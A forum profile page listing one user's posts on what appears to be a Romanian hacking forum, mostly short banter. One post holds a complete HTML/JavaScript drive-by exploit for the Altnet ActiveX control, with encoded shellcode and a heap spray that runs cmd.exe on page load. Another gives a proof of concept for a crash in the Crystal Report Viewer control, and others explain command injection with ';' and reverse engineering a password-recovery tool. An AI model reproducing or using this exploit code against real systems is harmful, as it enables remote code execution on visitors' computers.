Jump to content

escalation666

Active Members
  • Posts

    567
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by escalation666

  1. escalation666

    Pinguinul

    sexual harassment tux
  2. Adevarat. And in vain you scream against the wind. Shinook de ce a luat ban?
  3. functioneaza interplanetar
  4. vladutz doar l-a tradus, dupa ce in prealabil nu a acordat credits
  5. "Anyway, when you are not security aware you deserve to get owned. " Din cate stiu, nu e prima oara cand securitatea site-ulu respectiv este compromisa. Fool me once, shame on you, you won't fool me twice; dar se pare ca in unele cazuri istoria se repeta. In rest, am sa ignor aberatiile cu "hacar" si arsul monitorului
  6. E actiunea "hackerilor" "crestini" Anyway, when you are not security aware you deserve to get owned. Mai ales intr-o tara conservatoare, unde in mod sigur te poti astepta la tot felul de atacuri, atunci cand nu te incadrezi in anumiti parametri. Cat despre inteligenta, de cand inteligenta este la noi ceva respectat. Raman actuale versurile lui Eminescu: Nu spera când vezi misei La izbânda facând punte, Te-ar întrece nataraii, De ai fi cu stea în frunte.
  7. Am vazut asta pe un alt forum, si mi s-a parut teribil de amuzant So, here it is: http://break.com/index/it-guy-vs-dumb-employees.html
  8. Stiu ca exista un exploit pe metasploit pentru aceasta vulnerabilitate; am aflat asta dupa ce facusem deja un exploit pentru aceasta vulnerabilitate. Anyway...este o alta abordare fata de cea facuta in ruby, si foloseste tehnica heap memory spraying. <HTML> <-- coded by:escalation666 Altnet este un download manager ce este instalat automat de Kazaa; exploitul afecteaza un bof din dll-ul adm4.dll din Altnet. Shellcode-ul va executa cmd.exe. RegKey Safe for Script: True RegKey Safe for Init: True --> <head> <script> function exploit(){ var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" + "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" + "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" + "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" + "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" + "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" + "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" + "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" + "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" + "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" + "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" + "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" + "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" + "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" + "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" + "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" + "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" + "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" + "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" + "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" + "%u314e%u7475%u7038%u7765%u4370"); var argv1= "defaultv"; var argv2=1; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 400; i++){ memory[i] = block + shellcode } var buf = "" for (i = 0; i < 1031; i++) { buf = buf + unescape("%0A") } obj.Install(argv1,buf,argv1,argv2); } </script> </head> <body onload="javascript: return exploit();"><object id="obj" classid="clsid:DEF37997-D9C9-4A4B-BF3C-88F99EACEEC2"></object> </body> </HTML>
  9. <html> <-- found and coded by:escalation666 site:www.rstcenter.com RIP moubik Crystal Report Viewer Control crviewer.dll null pointer dereference Exploitable: No RegKey Safe for Script: True RegKey Safe for Init: True Disassembly: 600084AB PUSH ECX 600084AC PUSH ECX 600084AD PUSH ESI 600084AE PUSH EDI 600084AF MOV [EBP-10],ECX 600084B2 MOV EAX,[EBP+8] 600084B5 MOV ESI,[EAX+50] -> crash where eax: 00000000 ebp: 00000000 ebp+8: 00000000 Poc: --> <object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='test' /> </object> <head> <script language='javascript'> function exploit(){ var arg = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"; test.SearchByFormula(arg); } </script></head> <body onload="javascript: return exploit();"> </body> </html>
  10. hehe, nu numai, se poate face si un rootkit frumos pentru placile astea video
  11. dar inainte de a-ati face freza, poti incepe prin a-ti da foc
  12. offf baiatu mamii, iar te-a necajit rauleanu ala de Kw3[r]ln? nu te mai juca cu el atunci! bad kw3, bad!
  13. de fapt alea sunt adresele la care se gaseste intructiunea jmp esp, nu eip-ul
  14. escalation666

    Salut

    chiar si eldorado
  15. cum sa ai ip de alta tara? well, this is an easy one folks: te muti in alta tara
  16. Dar cat e sa observi exact ce registrii acceseaza IE PassView cu filemon sau regmon, si sa iti faci tu un programel in win32 sau c# care sa faca acelasi lucru Sau sa incerci putin reverse engineering tot in scopul de a observa ceea ce face.
  17. nice, simplu si eficient
  18. Prima metoda ar fi: fire-up Wireshark, trimiti o comanda de genul ping -c4 ip-ul tau, te uiti dupa pachetele icmp primite and there you go, ai adresa MAC. Intrucat programul verifica numai primele caractere dintr-o comanda, si nu ai specificat lungimea buffer-ului, se poate folosi ; pentru a executa o comanda dupa alta, si asta ar fi metoda numarul 2..
  19. inca o duma de la Puskin
  20. Puskin e. Because He is the Master, El este continuatorul seriei de versiuni a troianului beast, El este cel care a gasit un sql injection intr-un site apartinand NASA, El este cel care poate genera oricand coduri de reincarcare valide, El este cel care a creat virusul anti-manele si alti troieni FUD, El este cel care are private tools si exploituri la care noi muritorii de rand nici nu putem visa, El este cel care are un cont de cel putin 2 mil. de $, El este cel care a imblanzit scorpia numita hi5, si El va fi sfarsitul Internetului asa cum il stim. And greater epic stories are yet to come.
  21. Bine sa zicem ca faci un reverse engineering al programului, si descoperi ca evenimentele se produc absolut random, ce faci atunci? Poti exploata asta doar daca algoritmul "random" nu e chiar random. In real life s-a intamplat ca asemenea aparate sa fie vulnerabile (si cand zic asta ma refer la un capitol din "The art of intrusion" dedicat in totalitate acestui subiect), si in care autorii au exploatat ingenios vulnerabilitatea (and heh, for fun and profit), nu cu Pocket PC and shit sau cu casca de motociclist pe cap. Ramane sa cititi capitolul repsectiv, ca sa aflati cum au procedat
  22. Din prima secunda in care a intrat pe forum, vrea sa para ceea ce nu este.
  23. fa-ti cont pe dyndns si foloseste ddclient
  24. Welcome here consatene....
  25. Thanx for sharing, hardware hacking is fun.
×
×
  • Create New...